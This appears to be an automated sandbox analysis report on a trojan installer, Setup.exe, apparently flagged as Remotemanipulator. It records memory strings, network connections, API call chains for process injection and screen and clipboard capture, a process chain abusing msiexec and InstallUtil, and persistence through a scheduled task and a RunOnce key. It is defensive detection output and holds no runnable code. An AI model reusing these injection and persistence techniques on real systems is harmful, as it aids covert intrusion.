          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: https://www.globalsign.com/repository/06
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.c0yfKF26qNRb
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.w0HgyL2ZPBj2
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0030DA40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0030DA40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0030E145 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,5_2_0030E145
          Source: Yara matchFile source: Process Memory Space: 7LUEA3.pif PID: 6400, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015564D9 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,12_2_015564D9

          System Summary

          Source: Setup.exe, type: SAMPLEMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 Author: unknown
          Source: 0.0.Setup.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 Author: unknown
          Source: 00000000.00000000.1186904367.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 Author: unknown
          Source: 00000000.00000002.1205380161.00000000037EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 Author: unknown
          Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_008EDABA NtQuerySystemInformation,0_2_008EDABA
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01559961 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,12_2_01559961
          Source: C:\Windows\SysWOW64\choice.exeFile created: C:\Windows\Tasks\ROG Live Service.jobJump to behavior
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\7LUEA3.pif 1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 002E84D0 appears 36 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 002F3240 appears 73 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 06188B50 appears 55 times
          Source: Setup.exeStatic PE information: invalid certificate
          Source: Setup.exeStatic PE information: Resource name: RT_RCDATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: Setup.exeStatic PE information: Number of sections : 11 > 10
          Source: Setup.exe, 00000000.00000002.1210135833.000000000447C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Setup.exe
          Source: Setup.exe, 00000000.00000002.1213765321.000000000511D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Setup.exe
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezip.exe( vs Setup.exe
          Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Setup.exe, type: SAMPLEMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 reference_sample = 1dd15c830c0a159b53ed21b8c2ce1b7e8093256368d7b96c1347c6851ee6c4f6, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remotemanipulator, fingerprint = 02220e8af70ecffb3a7585f756c59ef5d9e17e6690c36d6bffc458e1d17dbd0c, id = 9ec52153-3b62-432d-b87c-895035df1a46, last_modified = 2022-01-13
          Source: 0.0.Setup.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 reference_sample = 1dd15c830c0a159b53ed21b8c2ce1b7e8093256368d7b96c1347c6851ee6c4f6, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remotemanipulator, fingerprint = 02220e8af70ecffb3a7585f756c59ef5d9e17e6690c36d6bffc458e1d17dbd0c, id = 9ec52153-3b62-432d-b87c-895035df1a46, last_modified = 2022-01-13
          Source: 00000000.00000000.1186904367.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 reference_sample = 1dd15c830c0a159b53ed21b8c2ce1b7e8093256368d7b96c1347c6851ee6c4f6, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remotemanipulator, fingerprint = 02220e8af70ecffb3a7585f756c59ef5d9e17e6690c36d6bffc458e1d17dbd0c, id = 9ec52153-3b62-432d-b87c-895035df1a46, last_modified = 2022-01-13
          Source: 00000000.00000002.1205380161.00000000037EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 reference_sample = 1dd15c830c0a159b53ed21b8c2ce1b7e8093256368d7b96c1347c6851ee6c4f6, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remotemanipulator, fingerprint = 02220e8af70ecffb3a7585f756c59ef5d9e17e6690c36d6bffc458e1d17dbd0c, id = 9ec52153-3b62-432d-b87c-895035df1a46, last_modified = 2022-01-13
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/8@3/4
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01544AED GetDiskFreeSpaceA,12_2_01544AED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00313BA0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,5_2_00313BA0
          Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\7LUEA3.pifJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Global\3630303063323963626363656234323637316431343330633561326137373663
          Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\dfc85a81Jump to behavior
          Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Setup.exeReversingLabs: Detection: 29%
          Source: InstallUtil.exeString found in binary or memory: ent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sc
          Source: InstallUtil.exeString found in binary or memory: than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on
          Source: InstallUtil.exeString found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
          Source: Setup.exeString found in binary or memory: step-start
          Source: Setup.exeString found in binary or memory: auto-start-reverse
          Source: Setup.exeString found in binary or memory: marker-start
          Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
          Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\choice.exe C:\Windows\SysWOW64\choice.exe
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\7LUEA3.pif "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx"
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: acgenral.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: msacm32.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: winmmbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: iconcodecservice.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: mstask.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Setup.exeStatic file information: File size 8060800 > 1048576
          Source: Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x52c400
          Source: Setup.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x191e00
          Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: tapiperf.pdb source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp, cbaxoydi.2.dr
          Source: Binary string: tapiperf.pdbGCTL source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp, cbaxoydi.2.dr
          Source: Binary string: wntdll.pdbUGP source: Setup.exe, 00000000.00000002.1210135833.0000000004359000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1213765321.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716809720.0000000009A94000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1618543385.00000000098F4000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Setup.exe, 00000000.00000002.1210135833.0000000004359000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1213765321.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716809720.0000000009A94000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1618543385.00000000098F4000.00000004.00001000.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01559BED VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,12_2_01559BED
          Source: Setup.exeStatic PE information: real checksum: 0x78fab0 should be: 0x7b42be
          Source: cbaxoydi.2.drStatic PE information: real checksum: 0x0 should be: 0x4cbe0
          Source: Setup.exeStatic PE information: section name: .didata
          Source: cbaxoydi.2.drStatic PE information: section name: rua
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00309F54 push es; mov dword ptr [esp], eax5_2_00309F5C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188548 push ecx; ret 5_2_0618855B
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01557145 push 01557171h; ret 12_2_01557169
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155717D push 015571A9h; ret 12_2_015571A1
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155710D push 01557139h; ret 12_2_01557131
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015571ED push 01557219h; ret 12_2_01557211
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0154318D push 015431B9h; ret 12_2_015431B1
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015571B5 push 015571E1h; ret 12_2_015571D9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0154A071 push 0154A09Dh; ret 12_2_0154A095
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01553035 push 015530E0h; ret 12_2_015530D8
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01553033 push 015530E0h; ret 12_2_015530D8
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015530E5 push 01553175h; ret 12_2_0155316D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015570B5 push 01557101h; ret 12_2_015570F9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155A341 push 0155A367h; ret 12_2_0155A35F
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155A301 push 0155A335h; ret 12_2_0155A32D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155A309 push 0155A335h; ret 12_2_0155A32D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015553D1 push 015553FDh; ret 12_2_015553F5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0154939F push 015497EDh; ret 12_2_015497E5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01555399 push 015553C5h; ret 12_2_015553BD
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155725D push 01557289h; ret 12_2_01557281
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155725B push 01557289h; ret 12_2_01557281
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155527D push 015552A9h; ret 12_2_015552A1
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015562F1 push 0155636Eh; ret 12_2_01556366
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015562EF push 0155636Eh; ret 12_2_01556366
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01557295 push 015572C1h; ret 12_2_015572B9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01559281 push 015592ADh; ret 12_2_015592A5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0155A2AE push 0155A335h; ret 12_2_0155A32D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01555509 push 01555535h; ret 12_2_0155552D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01555441 push 0155546Dh; ret 12_2_01555465
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01555479 push 015554A5h; ret 12_2_0155549D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01558479 push 015584A5h; ret 12_2_0155849D

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\7LUEA3.pif
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pif File created: C:\dfbffdd\AutoIt3.exe
          Source: C:\Windows\SysWOW64\choice.exe File created: C:\Users\user\AppData\Local\Temp\cbaxoydi
          Source: C:\Windows\SysWOW64\choice.exe File created: C:\Windows\Tasks\ROG Live Service.job
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pif Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cbdaghf

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\choice.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CBAXOYDI
          Source: C:\Users\user\Desktop\Setup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
